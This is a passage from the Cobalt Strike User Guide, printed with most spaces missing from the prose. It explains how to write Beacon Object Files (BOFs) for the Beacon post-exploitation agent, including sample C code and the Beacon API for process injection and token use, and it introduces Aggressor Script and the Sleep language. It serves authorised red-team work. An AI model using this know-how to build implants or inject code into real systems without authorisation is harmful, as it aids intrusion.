+ThejmpAddrandsysnumvaluesarerequiredforindirectSystemCalls,andfnAddrisrequired
+fordirectSystemCalls.Ifthevalueiszero,BeaconfallsbacktothecorrespondingWinAPIcall.
+Theuser-definedSystemCallinformationisskippedifthesyscallsfieldsintheUSER_DATA
+structurepointstoNULL.
+Custom Data
+BeaconUserDataallowsaReflectiveLoadertopassasmall(32bytes)databuffertoBeacon.
+BeaconObjectFiles(BOFs)canretrieveapointertothisdatawiththe
+BeaconGetCustomUserDatafunction.
+CobaltStrikeUserGuide www.fortra.com page:170
+
+BeaconObjectFiles/WhataretheadvantagesofBOFs?
+Beacon Object Files
+ABeaconObjectFile(BOF)isacompiledCprogram,writtentoaconventionthatallowsitto
+executewithinaBeaconprocessanduseinternalBeaconAPIs.BOFsareawaytorapidly
+extendtheBeaconagentwithnewpost-exploitationfeatures.
+What are the advantages of BOFs?
+Oneofthekeyrolesofacommand&controlplatformistoprovidewaystouseexternalpost-
+exploitationfunctionality.CobaltStrikealreadyhastoolstousePowerShell,.NET,andReflective
+DLLs.ThesetoolsrelyonanOPSECexpensivefork&runpatternthatinvolvesaprocesscreate
+andinjectionforeachpost-exploitationaction.BOFshavealighterfootprint.Theyruninsideofa
+Beaconprocessandarememorycanbecontrolledusingthemalleablec2profilewithinthe
+process-injectblock.
+BOFsarealsoverysmall.AUACbypassprivilegeescalationReflectiveDLLimplementationmay
+weighinat100KB+.Thesameexploit,builtasaBOF,is<3KB.Thiscanmakeabigdifference
+whenusingbandwidthconstrainedchannels,suchasDNS.
+Finally,BOFsareeasytodevelop.YoujustneedaWin32Ccompilerandacommandline.Both
+MinGWandMicrosoft'sCcompilercanproduceBOFfiles.Youdon'thavetofusswithproject
+settingsthataresometimesmoreeffortthanthecodeitself.
+How do BOFs work?
+ToBeacon,aBOFisjustablockofposition-independentcodethatreceivespointerstosome
+BeaconinternalAPIs.
+ToCobaltStrike,aBOFisanobjectfileproducedbyaCcompiler.CobaltStrikeparsesthisfile
+andactsasalinkerandloaderforitscontents.Thisapproachallowsyoutowriteposition-
+independentcode,foruseinBeacon,withouttediousgymnasticstomanagestringsand
+dynamicallycallWin32APIs.
+What are the disadvantages of BOFs?
+BOFsaresingle-fileCprogramsthatcallWin32APIsandlimitedBeaconAPIs.Don'texpectto
+linkinotherfunctionalityorbuildlargeprojectswiththismechanism.
+CobaltStrikedoesnotlinkyourBOFtoalibc.Thismeansyou'relimitedtocompilerintrinsics
+(e.g.,__stosbonVisualStudioformemset),theexposedBeaconinternalAPIs,Win32APIs,and
+CobaltStrikeUserGuide www.fortra.com page:171
+
+BeaconObjectFiles/HowdoIdevelopaBOF?
+thefunctionsthatyouwrite.Expectthatalotofcommonfunctions(e.g.,strlen,stcmp,etc.)are
+notavailabletoyouviaaBOF.
+BOFsexecuteinsideofyourBeaconagent.IfaBOFcrashes,youorafriendyouvaluewilllose
+access.WriteyourBOFscarefully.
+CobaltStrikeexpectsthatyourBOFsaresingle-threadedprogramsthatrunforashortperiodof
+time.BOFswillblockotherBeacontasksandfunctionalityfromexecuting.ThereisnoBOF
+patternforasynchronousorlong-runningtasks.Ifyouwanttobuildalong-runningcapability,
+consideraReflectiveDLLthatrunsinsideofasacrificialprocess.
+How do I develop a BOF?
+OpenyourpreferredtexteditorandstartwritingaCprogram.Here'saHelloWorldBOF:
+#include
+#include "beacon.h"
+void go(char * args, int alen) {
+BeaconPrintf(CALLBACK_OUTPUT, "Hello World: %s", args);
+}
+Downloadbeacon.h.
+TocompilethiswithVisualStudio:
+cl.exe /c /GS- hello.c /Fohello.o
+Tocompilethiswithx86MinGW:
+i686-w64-mingw32-gcc -c hello.c -o hello.o
+Tocompilethiswithx64MinGW:
+x86_64-w64-mingw32-gcc -c hello.c -o hello.o
+Thecommandsaboveproduceahello.ofile.Useinline-executeinBeacontoruntheBOF.
+beacon> inline-execute /path/to/hello.o these are arguments
+beacon.hcontainsdefinitionsforseveralinternalBeaconAPIs.Thefunctiongoissimilarto
+maininanyotherCprogram.It'sthefunctionthat'scalledbyinline-executeandargumentsare
+CobaltStrikeUserGuide www.fortra.com page:172
+
+BeaconObjectFiles/DynamicFunctionResolution
+passedtoit.BeaconOutputisaninternalBeaconAPItosendoutputtotheoperator.Notmuch
+toit.
+Dynamic Function Resolution
+GetProcAddress,LoadLibraryA,GetModuleHandle,andFreeLibraryareavailablewithinBOF
+files.YouhavetheoptiontousethesetoresolveWin32APIsyouwishtocall.Anotheroptionis
+touseDynamicFunctionResolution(DFR).
+DynamicFunctionResolutionisaconventiontodeclareandcallWin32APIsas
+LIBRARY$Function.ThisconventionprovidesBeaconwiththeinformationitneedstoexplicitly
+resolvethespecificfunctionandmakeitavailabletoyourBOFfilebeforeitruns.Whenthis
+processfails,CobaltStrikewillrefusetoexecutetheBOFandtellyouwhichfunctionitcouldn't
+resolve.
+Here'sanexampleBOFthatusesDFR andlooksupthecurrentdomain:
+#include
+#include
+#include
+#include "beacon.h"
+DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID,
+LPVOID,
+ULONG, LPVOID);
+DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);
+void go(char * args, int alen) {
+DWORD dwRet;
+PDOMAIN_CONTROLLER_INFO pdcInfo;
+dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
+if (ERROR_SUCCESS == dwRet) {
+BeaconPrintf(CALLBACK_OUTPUT, "%s", pdcInfo->DomainName);
+}
+NETAPI32$NetApiBufferFree(pdcInfo);
+}
+TheabovecodemakesDFR callstoDsGetDcNameAandNetApiBufferFreefromNETAPI32.
+WhenyoudeclarefunctionprototypesforDynamicFunctionResolution,paycloseattentionto
+thedecoratorsattachedtothefunctiondeclaration.Keywords,suchasWINAPIand
+DECLSPEC_IMPORTareimportant.Thesedecorationsprovidethecompilerwiththeneeded
+hintstopassargumentsandgeneratetherightcallinstruction.
+CobaltStrikeUserGuide www.fortra.com page:173
+
+BeaconObjectFiles/AggressorScriptandBOFs
+Aggressor Script and BOFs
+You'lllikelywanttouseAggressorScripttorunyourfinalizedBOFimplementationswithin
+CobaltStrike.ABOFisagoodplacetoimplementalateralmovementtechnique,anescalation
+ofprivilegetool,oranewreconnaissancecapability.
+The&beacon_inline_executefunctionisAggressorScript'sentrypointtorunaBOFfile.Hereisa
+scripttorunasimpleHelloWorldprogram:
+alias hello {
+local('$barch $handle $data $args');
+# figure out the arch of this session
+$barch = barch($1);
+# read in the right BOF file
+$handle = openf(script_resource("hello. $+ $barch $+ .o"));
+$data = readb($handle, -1);
+closef($handle);
+# pack our arguments
+$args = bof_pack($1, "zi", "Hello World", 1234);
+# announce what we're doing
+btask($1, "Running Hello BOF");
+# execute it.
+beacon_inline_execute($1, $data, "demo", $args);
+}
+Thescriptfirstdeterminesthearchitectureofthesession.Anx86BOFwillonlyruninanx86
+Beaconsession.Conversely,anx64BOFwillonlyruninanx64Beaconsession.Thisscriptthen
+readstargetBOFintoanAggressorScriptvariable.Thenextstepistopackourarguments.The
+&bof_packfunctionpacksargumentsinawaythatiscompatiblewithBeacon'sinternaldata
+parserAPI.Thisscriptusesthecustomary&btasktologtheactiontheuseraskedBeaconto
+perform.And,&beacon_inline_executerunstheBOFwithitsarguments.
+The&beacon_inline_executefunctionacceptstheBeaconIDasthefirstargument,astring
+containingtheBOFcontentasasecondargument,theentrypointasitsthirdargument,andthe
+packedargumentsasitsfourthargument.Theoptiontochooseanentrypointexistsincase
+youchoosetocombinelike-functionalityintoasingleBOF.
+HereistheCprogramthatcorrespondstotheabovescript:
+CobaltStrikeUserGuide www.fortra.com page:174
+
+BeaconObjectFiles/BOFCAPI
+/*
+* Compile with:
+* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
+* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
+*/
+#include
+#include
+#include
+#include "beacon.h"
+void demo(char * args, int length) {
+datap parser;
+char * str_arg;
+int num_arg;
+BeaconDataParse(&parser, args, length);
+str_arg = BeaconDataExtract(&parser, NULL);
+num_arg = BeaconDataInt(&parser);
+BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
+}
+Thedemofunctionisourentrypoint.Wedeclarethedatapstructureonthestack.Thisisan
+emptyanduninitiatedstructurewithstateinformationforextractingargumentspreparedwith
+&bof_pack.BeaconDataParseinitializesourparser.BeaconDataExtractextractsalength-
+prefixedbinaryblobfromourarguments.Ourpackfunctionhasoptionstopackbinaryblobsas
+zero-terminatedstringsencodedtothesession'sdefaultcharacterset,azero-terminatedwide-
+characterstring,orabinaryblobwithouttransformation.TheBeaconDataIntextractsaninteger
+thatwaspackedintoourarguments.BeaconPrintfisonewaytoformatoutputandmakeit
+availabletotheoperator.
+BOF C API
+Data Parser API
+TheDataParserAPIextractsargumentspackedwithAggressorScript's&bof_packfunction.
+Extractalength-prefixedbinaryblob.ThesizeargumentmaybeNULL.Ifanaddressisprovided,
+thesizeispopulatedwiththenumber-of-bytesextracted.
+char*BeaconDataExtract(datap*parser,int*size)
+Extracta4binteger.
+CobaltStrikeUserGuide www.fortra.com page:175
+
+BeaconObjectFiles/BOFCAPI
+intBeaconDataInt(datap*parser)
+Gettheamountofdatalefttoparse.
+intBeaconDataLength(datap*parser)
+Prepareadataparsertoextractargumentsfromthespecifiedbuffer.
+voidBeaconDataParse(datap*parser,char*buffer,intsize)
+Extracta2binteger.
+shortBeaconDataShort(datap*parser)
+Output API
+TheOutputAPIreturnsoutputtoCobaltStrike.
+FormatandpresentoutputtotheBeaconoperator.
+voidBeaconPrintf(inttype,char*fmt,...)
+SendoutputtotheBeaconoperator.
+voidBeaconOutput(inttype,char*data,intlen)
+Eachofthesefunctionsacceptsatypeargument.ThistypedetermineshowCobaltStrikewill
+processtheoutputandwhatitwillpresenttheoutputas.Thetypesare:
+CALLBACK_OUTPUTisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16
+(internally)usingthetarget'sdefaultcharacterset.
+CALLBACK_OUTPUT_OEMisgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-16
+(internally)usingthetarget'sOEMcharacterset.Youprobablywon'tneedthis,unless
+you'redealingwithoutputfromcmd.exe.
+CALLBACK_ERRORisagenericerrormessage.
+CALLBACK_OUTPUT_UTF8isgenericoutput.CobaltStrikewillconvertthisoutputtoUTF-
+16(internally)fromUTF-8.
+Format API
+TheformatAPIisusedtobuildlargeorrepeatingoutput.
+CobaltStrikeUserGuide www.fortra.com page:176
+
+BeaconObjectFiles/BOFCAPI
+Allocatememorytoformatcomplexorlargeoutput.
+voidBeaconFormatAlloc(formatp*obj,intmaxsz)
+Appenddatatothisformatobject.
+voidBeaconFormatAppend(formatp*obj,char*data,intlen)
+Freetheformatobject.
+voidBeaconFormatFree(formatp*obj)
+Appenda4binteger(bigendian)tothisobject.
+voidBeaconFormatInt(formatp*obj,intval)
+Appendaformattedstringtothisobject.
+voidBeaconFormatPrintf(formatp*obj,char*fmt,...)
+Resetstheformatobjecttoitsdefaultstate(priortore-use).
+voidBeaconFormatReset(formatp*obj)
+Extractformatteddataintoasinglestring.Populatethepassedinsizevariablewiththelength
+ofthisstring.TheseparametersaresuitableforusewiththeBeaconOutputfunction.
+char*BeaconFormatToString(formatp*obj,int*size)
+Internal APIs
+ThefollowingfunctionsmanipulatethetokenusedinthecurrentBeaconcontext:
+ApplythespecifiedtokenasBeacon'scurrentthreadtoken.Thiswillreportthenewtokentothe
+usertoo.ReturnsTRUEifsuccessful.FALSEisnot.
+BOOLBeaconUseToken(HANDLEtoken)
+Dropthecurrentthreadtoken.UsethisoverdirectcallstoRevertToSelf.Thisfunctioncleansup
+otherstateinformationaboutthetoken.
+voidBeaconRevertToken()
+ReturnsTRUEifBeaconisinahigh-integritycontext.
+CobaltStrikeUserGuide www.fortra.com page:177
+
+BeaconObjectFiles/BOFCAPI
+BOOLBeaconIsAdmIn()
+ThefollowingfunctionsprovidesomeaccesstoBeacon'sprocessinjectioncapability:
+Populatethespecifiedbufferwiththex86orx64spawntovalueconfiguredforthisBeacon
+session.
+voidBeaconGetSpawnTo(BOOLx86,char*buffer,intlength)
+Thisfunctionspawnsatemporaryprocessaccountingforppid,spawnto,andblockdllsoptions.
+GrabthehandlefromPROCESS_INFORMATIONtoinjectintoormanipulatethisprocess.
+ReturnsTRUEifsuccessful.
+BOOLBeaconSpawnTemporaryProcess(BOOLx86,BOOLignoreToken,
+STARTUPINFO*sInfo,PROCESS_INFORMATION*pInfo)
+Thisfunctionwillinjectthespecifiedpayloadintoanexistingprocess.Usepayload_offsetto
+specifytheoffsetwithinthepayloadtobeginexecution.Theargvalueisforarguments.argmay
+beNULL.
+voidBeaconInjectProcess(HANDLEhProc,intpid,char*payload,intpayload_len,
+intpayload_offset,char*arg,intarg_len)
+ThisfunctioninjectsthespecifiedpayloadintoatemporaryprocessthatyourBOFoptedto
+launch.Usepayload_offsettospecifytheoffsetwithinthepayloadtobeginexecution.Thearg
+valueisforarguments.argmaybeNULL.
+voidBeaconInjectTemporaryProcess(PROCESS_INFORMATION*pInfo,char*
+payload,intpayload_len,intpayload_offset,char*arg,intarg_len)
+Thisfunctioncleansupsomehandlesthatareoftenforgottenabout.Callthiswhenyou'redone
+interactingwiththehandlesforaprocess.Youdon'tneedtowaitfortheprocesstoexitorfinish.
+voidBeaconCleanupProcess(PROCESS_INFORMATION*pInfo)
+ThefollowingfunctionsareusedtoaccessstoreditemsinBeaconDataStore:
+Returnsapointertothespecificitem.Ifthereisnoentryatthatindex,thefunctionreturns
+NULL.
+PDATA_STORE_OBJECTBeaconDataStoreGetItem(size_tindex)
+ThisfunctionobfuscatesaspecificiteminBeaconDataStore.
+voidBeaconDataStoreProtectItem(size_tindex)
+CobaltStrikeUserGuide www.fortra.com page:178
+
+BeaconObjectFiles/BOFCAPI
+Thisfunctionun-obfuscatesaspecificiteminBeaconDataStore.
+voidBeaconDataStoreUnprotectItem(size_tindex)
+ReturnthemaximumsizeofBeaconDataStore.
+size_tBeaconDataStoreMaxEntries()
+Thefollowingfunctionisautilityfunction:
+Convertthesrc stringtoaUTF16-LEwide-characterstring,usingthetarget'sdefaultencoding.
+max isthesize(inbytes!)ofthedestinationbuffer.
+BOOLtoWideChar(char*src,wchar_t*dst,intmax)
+Thisfunctionreturnsinformationaboutbeaconsuchasthebeaconaddress,sectionstomask,
+heaprecordstomask,themask,sleepmaskaddressandsleepmasksizeinformation.
+voidBeaconInformation(BEACON_INFO*info);
+ThefollowingfunctionsprovideaccesstoBeacon'skeyvaluestore:
+Thisfunctionaddsamemoryaddresstoaninternalkeyvaluestoretoallowtheabilityto
+retrievethisvalueusingthekeyinasubsequentBOFexecution.
+BOOLBeaconAddValue(constchar*key,void*ptr);
+Thisfunctionretrievesthememoryaddressthatisassociatedwiththekey fromtheinternal
+keyvaluestore.IfthekeyisnotfoundthenNULLisreturned.
+void*BeaconGetValue(constchar*key);
+Thisfunctionremovesthekey fromtheinternalkeyvaluestore.Thiswillnotdoanymemory
+cleanupofthememoryaddressandafinialexecutionofaBOFshoulddothenecessaryclean
+upinordertopreventmemoryleaks.
+BOOLBeaconRemoveValue(constchar*key);
+ThefollowingfunctionretrievesthecustomdatabufferfromBeaconUserData.
+char*BeaconGetCustomUserData()
+WhenaUserDefinedReflectiveLoaderprovidesBeaconUserData(BUD)duringtheloading
+process,thenthisfunctionwillreturnapointertothecustombufferarrayassociatedwiththe
+BUD.Thesizeofthisbufferarrayisfixedat32bytes,asdefinedintheUSER_DATAstructure.A
+CobaltStrikeUserGuide www.fortra.com page:179
+
+BeaconObjectFiles/FormattingBOFOutput
+validmemorypointerisalwaysreturned.IfnoBUDisprovidedbytheUserDefinedReflective
+Loader,thenthepointeristothedefaultbufferarraywithall32valuessettozero.
+Formatting BOF Output
+ThebeaconformatAPIallowsyoutomodifyhowbeaconreturnsdatatotheusertosuitthe
+usersNeed.Datareturnedinaloopisanobviousexampleanduse-caseforthisAPI.
+WithouttheBeaconFormatAPI,beaconwillsendtheoutputbacktoyoueverytimeyouusethe
+BeaconPrintfAPIcall.Thiscouldleadtoformattingthatislessthanideal.
+Thebestwaytoillustratetheproblemisbyusingsomeexamples.
+Example - Simple counting BOF using a loop:
+CountingBOFExample
+1 #include
+2 #include "beacon.h"
+3 #include "bofdefs.h"
+4
+5 void LoopExample()
+6 {
+7 int i;
+8 for(i=0;i<11;i++)
+9 {
+10 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i);
+11 }
+12 }
+13
+14 void go(char * args, int len) {
+15 LoopExample();
+16 }
+Whenthecodeisexecuted,youshouldseethefollowingresult:
+CobaltStrikeUserGuide www.fortra.com page:180
+
+BeaconObjectFiles/FormattingBOFOutput
+figure68-Example1Output
+Asexpected,theoutputisservedbackinchunks,displayingspacinginbetweeneventhougha
+newlinecharacterwasnotspecifiedbecauseBeaconPrintfautomaticallyaddsanewlinefor
+you.
+IfyoumodifytheBeaconObjectFiletousetheBeaconFormatAPIinstead,youcangainmore
+controloverwhattheoutputlookslikewithfollowingsteps:
+1. First,allocatememorytoformattheoutput.
+2. Oncethebufferisallocatedandthereisapointertothebuffer,appendtothebuffer
+usingtheappendAPIslikeBeaconFormatAppend,BeaconFormatintand
+BeaconFormatPrintf.
+3. Whensatisfiedwiththebuffer,printitoutusingBeaconFormatToString
+4. Afterwards,youcaneitherreusethebufferforadditionaloperationsusing
+BeaconFormatResetor,ifyouaredonewithit,freeuptheallocatedmemoryusing
+BeaconFormatFree.
+Example - Using this approach in the counting BOF
+CountingBOFExample2
+1 #include
+2 #include "beacon.h"
+3 #include "bofdefs.h"
+4
+CobaltStrikeUserGuide www.fortra.com page:181
+
+BeaconObjectFiles/FormattingBOFOutput
+5 void LoopExampleWithFormatting()
+6 {
+7 //1. create the new buffer pointer
+8 formatp buffer;
+9
+10 //2. allocate memory to hold the formatted data
+11 BeaconFormatAlloc(&buffer,1024);
+12
+13 int i;
+14 for(i=0;i<11;i++)
+15 {
+16 //3. instead of printing, we will now fill the buffer - notice the new line
+character!
+17 BeaconFormatPrintf(&buffer, "counter is currently at: %i\n",i);
+18 }
+19
+20 //4. now that we have our filled up buffer, let's print it out
+21 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL));
+22
+23 //5. time to free up the buffer
+24 BeaconFormatFree(&buffer);
+25 }
+26
+27 void LoopExample()
+28 {
+29 int i;
+30 for(i=0;i<11;i++)
+31 {
+32 BeaconPrintf(CALLBACK_OUTPUT,"counter is currently at %i",i);
+33 }
+34 }
+35
+36 void go(char * args, int len) {
+37 LoopExampleWithFormatting();
+38 }
+Whenthecodeisexecuted,youshouldseethefollowingresult:
+CobaltStrikeUserGuide www.fortra.com page:182
+
+BeaconObjectFiles/FormattingBOFOutput
+Example - Read the virtual memory of the current process
+ReadVirtualMemoryExample
+1 #include
+2 #include "beacon.h"
+3 #include "bofdefs.h"
+4
+5 HMODULE GetModHandle(LPCSTR module)
+6 {
+7 HMODULE hModule = KERNEL32$GetModuleHandleA(module);
+8 return hModule ? hModule : KERNEL32$LoadLibraryA(module);
+9 }
+10
+11 LPVOID GetMemptr(LPCSTR module, LPCSTR function)
+12 {
+13 HMODULE hModule = GetModHandle(module);
+14 LPVOID memPtr = KERNEL32$GetProcAddress(hModule,function);
+15 return memPtr? memPtr : NULL;
+16 }
+17
+18 //format options: 1 decompile format, any other number - raw opcodes
+19 void ReadvirtualMemory(LPCSTR module, LPCSTR function,int size, int format)
+20 {
+21 LPVOID memPtr = GetMemptr(module,function);
+22 if(!memPtr)
+23 {
+24 BeaconPrintf(CALLBACK_ERROR,"no memptr found\n");
+CobaltStrikeUserGuide www.fortra.com page:183
+
+BeaconObjectFiles/FormattingBOFOutput
+25 return;
+26 }
+27 else
+28 {
+29 formatp buffer;
+30 BeaconFormatAlloc(&buffer,1024);
+31 BYTE *readbuffer = (BYTE*)MSVCRT$malloc(size);
+32 SIZE_T bytesread = 0;
+33 KERNEL32$ReadProcessMemory((HANDLE)-1,memPtr,readbuffer,size,&bytesread);
+34 BeaconFormatPrintf(&buffer, "showing the first %i opcodes of
+%s!%s\n",size,module,function);
+35
+36 for(int i = 0; i < size; i++)
+37 {
+38 if(format == 1)
+39 {
+40 BeaconFormatPrintf(&buffer,"\\x%02X",readbuffer[i]);
+41 }
+42 else
+43 {
+44 BeaconFormatPrintf(&buffer,"%02X",readbuffer[i]);
+45 }
+46 }
+47 BeaconPrintf(CALLBACK_OUTPUT,"%s\n",BeaconFormatToString(&buffer,NULL));
+48 BeaconFormatFree(&buffer);
+49 MSVCRT$free(readbuffer);
+50 }
+51 }
+52 void go(char * args, int len) {
+53 char* module;
+54 char* function;
+55 int size;
+56 int format;
+57 datap parser;
+58 BeaconDataParse(&parser, args, len);
+59 module = BeaconDataExtract(&parser,NULL);
+60 function = BeaconDataExtract(&parser,NULL);
+61 size = BeaconDataInt(&parser);
+CobaltStrikeUserGuide www.fortra.com page:184
+
+BeaconObjectFiles/FormattingBOFOutput
+62 format = BeaconDataInt(&parser);
+63 ReadvirtualMemory(module, function, size, format);
+64 }
+InthisBOF,usershavetheoptiontoreadanarbitrarynumberofbytesofafunctionwithinthe
+currentprocessanddisplayitinspecificformats.UsingtheBeaconFormatAPI,thisbecomes
+trivialtodo.
+Forexample,youcandisplaybytesasfollows:
+Thismakesiteasytocopypastetheoutputandputitinadecompilerlikeso:
+Otherswouldratherhaveallthebytesrightnexttoeachotherlikeso:
+CobaltStrikeUserGuide www.fortra.com page:185
+
+AggressorScript/WhatisAggressorScript?
+Aggressor Script
+What is Aggressor Script?
+AggressorScriptisthescriptinglanguagebuiltintoCobaltStrike,version3.0,andlater.
+AggressorScriptallowsyoutomodifyandextendtheCobaltStrikeclient.
+History
+AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein
+Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack
+program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploitFramework
+anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof
+CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit
+CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis
+workisAggressorScript.
+AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations
+inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning
+botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit
+toextendandmodifytheCobaltStrikeclienttoyourneeds.
+Status
+AggressorScriptispartofCobaltStrike3.0'sfoundation.Mostpopupmenusandthe
+presentationofeventsinCobaltStrike3.0aremanagedbytheAggressorScriptengine.That
+said,AggressorScriptisstillinitsinfancy.StrategicCyberLLChasyettobuildAPIsformostof
+CobaltStrike'sfeatures.ExpecttoseeAggressorScriptevolveovertime.Thisdocumentationis
+alsoaworkinprogress.
+How to Load Scripts
+AggressorScriptisbuiltintotheCobaltStrikeclient.Topermanentlyloadascript,gotoCobalt
+Strike -> Script ManagerandpressLoad.
+CobaltStrikeUserGuide www.fortra.com page:186
+
+AggressorScript/TheScriptConsole
+figure69-CobaltStrikeScriptLoader
+The Script Console
+CobaltStrikeprovidesaconsoletocontrolandinteractwithyourscripts.Throughtheconsole
+youmaytrace,profile,debug,andmanageyourscripts.TheAggressorScriptconsoleis
+availableviaView -> Script Console.
+Thefollowingcommandsareavailableintheconsole:
+Command Arguments What it does
+? "*foo*"iswm"foobar" evaluateasleeppredicateandprintresult
+e println("foo"); evaluateasleepstatement
+help listallofthecommandsavailable
+load /path/to/script.cna loadanAggressorScriptscript
+ls listallofthescriptsloaded
+proff script.cna disabletheSleepprofilerforthescript
+profile script.cna dumpsperformancestatisticsforthescript.
+pron script.cna enablestheSleepprofilerforthescript
+reload script.cna reloadsthescript
+troff script.cna disablefunctiontraceforthescript
+tron script.cna enablefunctiontraceforthescript
+unload script.cna unloadthescript
+x 2+2 evaluateasleepexpressionandprintresult
+CobaltStrikeUserGuide www.fortra.com page:187
+
+AggressorScript/HeadlessCobaltStrike
+figure70-Interactingwiththescriptconsole
+Headless Cobalt Strike
+YoumayuseAggressorScriptswithouttheCobaltStrikeGUI.Theagscriptprogram(included
+withtheCobaltStrikeLinuxpackage)runstheheadlessCobaltStrikeclient.Theagscript
+programrequiresfourarguments:
+./agscript [host] [port] [user] [password]
+TheseargumentsconnecttheheadlessCobaltStrikeclienttotheteamserveryouspecify.The
+headlessCobaltStrikeclientpresentstheAggressorScriptconsole.
+Youmayuseagscripttoimmediatelyconnecttoateamserverandrunascriptofyour
+choosing.Use:
+./agscript [host] [port] [user] [password] [/path/to/script.cna]
+ThiscommandwillconnecttheheadlessCobaltStrikeclienttoateamserver,loadyourscript,
+andrunit.TheheadlessCobaltStrikeclientwillrunyourscriptbeforeitsynchronizeswiththe
+teamserver.Useon readytowaitfortheheadlessCobaltStrikeclienttofinishthedata
+synchronizationstep.
+on ready {
+println("Hello World! I am synchronized!");
+closeClient();
+}
+AQuick Sleep Introduction
+CobaltStrikeUserGuide www.fortra.com page:188
+
+AggressorScript/AQuickSleepIntroduction
+AggressorScriptbuildsonRaphaelMudge'sSleepScriptingLanguage.TheSleepmanualis
+availableathttp://sleep.dashnine.org/manual
+AggressorScriptwilldoanythingthatSleepdoessuchas:
+l Sleep'ssyntax,operators,andidiomsaresimilartothePerlscriptinglanguage.Thereis
+onemajordifferencethatcatchesnewprogrammers.Sleeprequireswhitespace
+betweenoperatorsandtheirterms.Thefollowingcodeisnotvalid:
+$x=1+2; # this will not parse!!
+Thisstatementisvalidthough:
+$x = 1 + 2;
+l Sleepvariablesarecalledscalarsandscalarsholdstrings,numbersinvariousformats,
+Javaobjectreferences,functions,arrays,anddictionaries.Hereareseveral
+assignmentsinSleep:
+$x = "Hello World";
+$y = 3;
+$z = @(1, 2, 3, "four");
+$a = %(a => "apple", b => "bat", c => "awesome language", d => 4);
+l Arraysanddictionariesarecreatedwiththe@ and% functions.Arraysanddictionaries
+mayreferenceotherarraysanddictionaries.Arraysanddictionariesmayevenreference
+themselves.
+l Commentsbeginwitha#andgountiltheendoftheline.
+l Sleepinterpolatesdouble-quotedstrings.Thismeansthatanywhite-spaceseparated
+tokenbeginningwitha$ signisreplacedwithitsvalue.Thespecialvariable$+
+concatenatesaninterpolatedstringwithanothervalue.
+println("\$a is: $a and \n\$x joined with \$y is: $x $+ $y");
+Thiswillprintout:
+$a is: %(d => 4, b => 'bat', c => 'awesome language', a => 'apple') and
+$x joined with $y is: Hello World3
+l There'safunctioncalled&warn.Itworkslike&println,exceptitincludesthecurrent
+scriptnameandalinenumbertoo.Thisisagreatfunctiontodebugcodewith.
+l Sleepfunctionsaredeclaredwiththesubkeyword.Argumentstofunctionsarelabeled
+$1,$2,allthewayupto$n.Functionswillacceptanynumberofarguments.The
+variable@_isanarraycontainingalloftheargumentstoo.Changesto$1,$2,etc.will
+alterthecontentsof@_.
+CobaltStrikeUserGuide www.fortra.com page:189
+
+AggressorScript/InteractingwiththeUser
+sub addTwoValues {
+println($1 + $2);
+}
+addTwoValues("3", 55.0);
+Thisscriptprintsout:
+58.0
+l InSleep,afunctionisafirst-classtypelikeanyotherobject.Hereareafewthingsthat
+youmaysee:
+$addf = &addTwoValues;
+l The$addfvariablenowreferencesthe&addTwoValuesfunction.Tocallafunction
+enclosedinavariable,use:
+[$addf : "3", 55.0];
+l ThisbracketnotationisalsousedtomanipulateJavaobjects.Irecommendreadingthe
+Sleepmanualifyou'reinterestedinlearningmoreaboutthis.Thefollowingstatements
+areequivalentandtheydothesamething:
+[$addf : "3", 55.0];
+[&addTwoValues : "3", 55.0];
+[{ println($1 + $2); } : "3", 55.0];
+addTwoValues("3", 55.0);
+l Sleephasthreevariablescopes:global,closure-specific,andlocal.TheSleepmanual
+coversthisinmoredetail.Ifyouseelocal('$x$y$z')inanexample,itmeansthat$x,$y,
+and$zarelocaltothecurrentfunctionandtheirvalueswilldisappearwhenthefunction
+returns.Sleepuseslexicalscopingforitsvariables.
+Sleephasalloftheotherbasicconstructsyou'dexpectinascriptinglanguage.Youshouldread
+themanualtolearnmoreaboutit.
+Interacting with the User
+AggressorScriptdisplaysoutputusingSleep's&println,&printAll,&writeb,and&warnfunctions.
+Thesefunctionsdisplayoutputtothescriptconsole.
+Scriptsmayregistercommandsaswell.Thesecommandsallowscriptstoreceiveatrigger
+fromtheuserthroughtheconsole.Usethecommandkeywordtoregisteracommand:
+CobaltStrikeUserGuide www.fortra.com page:190
+
+AggressorScript/CobaltStrike
+command foo{
+println("Hello $1");
+}
+Thiscodesnippetregistersthecommandfoo.Thescriptconsoleautomaticallyparsesthe
+argumentstoacommandandsplitsthembywhitespaceintotokensforyou.$1isthefirst
+token,$2isthesecondtoken,andsoon.Typically,tokensareseparatedbyspacesbutusers
+mayuse"doublequotes"tocreateatokenwithspaces.Ifthisparsingisdisruptivetowhatyou'd
+liketodowiththeinput,use$0toaccesstherawtextpassedtothecommand.
+figure71-CommandOutput
+Colors
+YoumayaddcolorandstylestotextthatisoutputinCobaltStrike'sconsoles.The\c,\U,and
+\oescapestellCobaltStrilehowtoformattext.Theseescapesareparsedinsideofdouble-
+quotedstringsonly.
+The\cXescapecolorsthetextthatcomesafterit.Xspecifiesthecolor.Yourcolorchoicesare:
+figure72-ColorOptions
+The\Uescapeunderlinesthetextthatcomesafterit.Asecond\Ustopstheunderlineformat.
+The\oescaperesetstheformatofthetextthatcomesafterit.Anewlineresetstextformatting
+aswell.
+Cobalt Strike
+The Cobalt Strike Client
